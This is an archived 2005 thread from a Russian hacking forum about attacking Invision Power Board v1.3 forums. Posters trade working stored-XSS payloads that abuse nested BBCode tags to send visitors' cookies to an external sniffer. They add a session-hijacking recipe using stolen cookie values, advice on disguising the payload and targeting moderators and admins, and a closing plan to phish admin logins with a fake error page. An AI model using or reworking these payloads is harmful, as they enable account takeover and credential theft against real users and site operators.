Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р) (https://forum.antichat.xyz/showthread.php?t=5233)

FRTD 17.02.2005 01:14

Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р)
 
Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003

Вот пробовал получить хэш,а ни хрена
пользовался:
[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR] также пробовал через Видео,но на логе не появляется информация.Почему,в чём я ошибся?

З.Ы.я понимаю что такие вопросы вас задолбали,но в поиске я нихрена не нашёл=(

ExpertLamer 17.02.2005 01:44

Вообщето это мой код, =) в конце K: =)

У тебя должен быть IЕ и у них тоже.
Или код измени только Алгол знает как.

FRTD 17.02.2005 01:51

тоесть вот так?[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?Ie:"+document.cookie) [/COLOR]
Что значит у них тоже?Это у кого?

З.Ы.я не знаю чей это код,просто ходил по форуму и скопировал,я в этом слабо понимаю

ExpertLamer 17.02.2005 01:53

Нет, у тебя какой браузер? Интернет эксплорер?
Если нет, то не будит работать.

FRTD 17.02.2005 01:55

у меня есть Опера,Фокс и Эксплор.Надо через эксплор?

ExpertLamer 17.02.2005 01:58

да.








Или код менять.

Алгол знает как.

FRTD 17.02.2005 02:00

ща попробовал через эксплор...А если я выхожу и вхожу со своего компа в снифере это должно отобразиться?Чё то не показыватся

ExpertLamer 17.02.2005 02:03

Непонил.

FRTD 17.02.2005 02:08

ну смотри,я отправляю через эксплорер сообщение в форум [COLOR=]`style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?Ie:"+document.cookie)[/COLOR]
после этого по идее(как я понял)все входу пользователей должны фиксироваться тем,что на сниффер приходит инфа о кукизах итп.Значит если я выхожу из своего логина на форуме,а потом захожу обратно,инфа о моих пирожках тоже должна появится.Так?
З.Ы.просто я не совсем догоняю весь этот процесс поэтому я могу что нить неправильно сказать(первый раз всё-таки)

ExpertLamer 17.02.2005 02:26

Ну они должны посмотреть на страницу с снифером. И мой код используй.

FRTD 17.02.2005 02:53

что то не выходит=(
а если для маскировочки я напишу так:
1)круто[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/color]
2)круто` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)
это будет работать?Или (1) или (2)?

З.Ы.мне зайти на...?

ExpertLamer 17.02.2005 03:06

нет не тебе. Util.

1-й работает.
Ты что то не правильно делаешь.

На снифер
Код HTML:

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR]
На алёрт.

Код HTML:

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR]
Фонт менять у меня не получается как вот тут и не кто помогать кроме UTIL не хочит. Все здохли чтоли?

http://antichat.ru/txt/IPB/index1.php

FRTD 17.02.2005 03:10

а как понять на алерт?Что это даёт?

ExpertLamer 17.02.2005 03:21

Это ты сам должен посмотреть. Трудно тебе объяснить.

Вот иди ко мне там пробуй и тесты проводи.

http://www.whitejordan.ipbfree.com/

Я White Jordan.

Мне тут просто баннули ник.

FRTD 17.02.2005 03:22

похоже заработало частично,по крайней мере мой ИП и куки отображаются на сниффере, но нету реферера.Придётся завтра с утра пораньше отлавливать модеров=).Или что то опять неправильно?
А что попробовать?Алерт тебе запостить?

ExpertLamer 17.02.2005 03:26

да нет вродебы правельно.

А вдруг у них не Интернет Эксплорер?

FRTD 17.02.2005 03:29

а чё если у них не Эксплорер то сё накрылось?=(

ExpertLamer 17.02.2005 03:33

Не, если у них ИЭ то БУДИТ работать, а если нет, то код будит видным и тебя поймают и 3 кода лишенния свободы.....................

FRTD 17.02.2005 03:38

да то что код виден хер с ним.Главное чтобы куки отправились на снифф.Куки придут?

FRTD 17.02.2005 03:44

А если я после кода пропишу что нить то он будет работать?

Становиться ещё интереснее!!!:)Хотел щас дописать приписку" [color=http://aaaaa/=`aaajpg]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/color] если у вас не отображается картинка,зайдите через Internet Explorer"(для очень доверчивых),а мне выдают:"незя использовать такой тег".Это по идее заплатка.Но почему она меня пропустила первый раз?

ExpertLamer 17.02.2005 04:57

Потому что первый раз уже вписалось.

Поэтому иди на чистое место.

И когда код виден он соровно работает не бойся.

Тут не код проблема а теги.

FRTD 17.02.2005 14:02

понятно,ну этот код тока для эксплорера пашет=(И что хуже,там нету реферера,приходиться сидеть и ждать

FRTD 17.02.2005 17:33

а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает

Algol 17.02.2005 19:47

Цитата:

Сообщение от frtd
а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает

Нужно обязательно ставить фильтр либо на реферер, либо на Query.

ExpertLamer 18.02.2005 02:16

Цитата:

Сообщение от FRTD
а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает


EDIT: Ошибка, прошу прошение. Когда код виден, то он работать НЕ будит.

Только что проверил.

Ищи другие теги так как проблема почему виден код в том, что ИЭ и Firefox по разному обрабатывают тег "IMG".

И ещё. Ты просто не знаешь что такое что.

Код HTML:

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR]
Вот это код. "К:" это QUERY. REFERER это адрес страничьки где находится сам код.
Вот образец REFERER:
http://www.izvestia.ru/forum/topic.c...c=9663&start=0

ExpertLamer 18.02.2005 02:30

Когда имеешь кукииз и у тебя нет пароля, то на любых версиях можно зделать следуещие.

Используй javascript:void(document.cookie)

Код:

javascript:void(document.cookie="pass_hash=XXXXXX" ); javascript:void(document.cookie="session_id=XXXXXX "); javascript:void(document.cookie="user_id=XXXXXX")

Это ты должен всё в URL поставить и самое главное не забудь, ты должен быть в входе под другим именем. Тоесть ты должен быть "Logged in". Потом вводишь это и нажимаешь GO а потом Refresh.

И самое главное знай что чтобы это у тебя получилось, твоя жертва тоже должна быть "Logged in". Если у тебя жертва "Logged out" то по МОИМ тестам нечиго не получится. Хотя если Я не прав поправте.

А с прогой Inetcrack тесты Я пока не делал так что не знаю, может не получится если жертва не "Logged in" ?

Алгол Я не разу не мог поменять фонт или попугать людей как ты вот тут. http://antichat.ru/txt/IPB/index1.php
Если можешь, то помоги пожалуйста.

Вот мой код который Я вставляю. Я его изменил на калар тег, но может быть проблема не в теги а в фильтре? Что конкретно что за проблема не понимаю.

Вот Я написал собственный код изменив тег "VIDEO" на "COLOR"

Код HTML:

[COLOR=[IMG]http://aaaaa/=`aaajpg[/IMG]]` style=background:url(javascript:document.body.innerHTML="http://antichat.ru/h.gif")[/COLOR]
Работает но как то не так и только когда PM кому то посылаю. А может быть адрес картинки поменять?
А когда пост делаю вообще не работает может быть потому что фильтор стоит но какой?

FRTD 18.02.2005 23:45

чё туда надо вставлять адрес?Типа так?
Код:

[COLOR=http://aaa.aa/=`aaa.jpg]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:http://www.****.com/forum/index.php?showtopic=4"+document.cookie) [/COLOR]
Раз на Фоксе не пойдёт,мож кто нить другой код подскажет?Какой нить универсальный что ли?
По поводу хэша:не проще его расшивровать?Тогда никого ждать не надо

ExpertLamer 19.02.2005 14:55

Чего????

Ты меня совсем запутал. Что встовлять Я помой му уже очень хорошо расказал.

Ещё раз всё прочти или правильно задай вопрос Я не понил что ты спросил.

FRTD 20.02.2005 02:51

Распутываю:существует ли какой либо код,но универсальный для большинства браузеров?Если да,то где взять?

ExpertLamer 20.02.2005 05:41

Napisat' svoiu.

KEZ 20.02.2005 11:03

Вложенные теги сработают только в IE
а [videо] везде вроде

FRTD 06.03.2005 00:41

вообщем давайте так:есть форум http://www.qwerty.com/forum/
можете мне написать код,чтобы он работал в большинстве браузеров,или хотя бы только для ИЕ,но чтобы реферер работал,пажаласта,очень надо

FRTD 10.03.2005 19:07

ЛюДИ!Есть кто живой?Ответте пажаласта

coyl 11.03.2005 00:19

frtd -псих
сам с собой разговариват =)

rsha1988 11.03.2005 01:42

Цитата:

Сообщение от coyl
frtd -псих
сам с собой разговариват =)

Бывает)

FRTD 12.03.2005 02:03

просто никто не отвечает

Xeeper 12.03.2005 04:12

Frdt не псих

White Jordan 12.03.2005 04:17

Почему?

advlam 12.03.2005 14:07

А какую дыру использовать на Powered by Invision Power Board(U) v1.3.1 Final © 2003 IPS, Inc.???

(-=util=-) 12.03.2005 14:56

1. делаешь свой снифер (чтобы без всяких подписок) Используешь баг с спаренными тэгами (т.е. пихаешь админу в ПМ снифер). И ждёшь когда прилетят к тебе куки. Потом редактируешь свои.
2. (если куки непришли) Спомощью тех же тэгов делаешь пересылку на свою страницу в ПМ админу. А на своей странице точная копия того форума (одна страница ошибки авторизации) Но в теле этой страницы ввод пароля и логина придёт к тебе на ящик. :)
Покрайней мере у меня работало =)
P.S. Это для MyIE и IE


Время: 03:31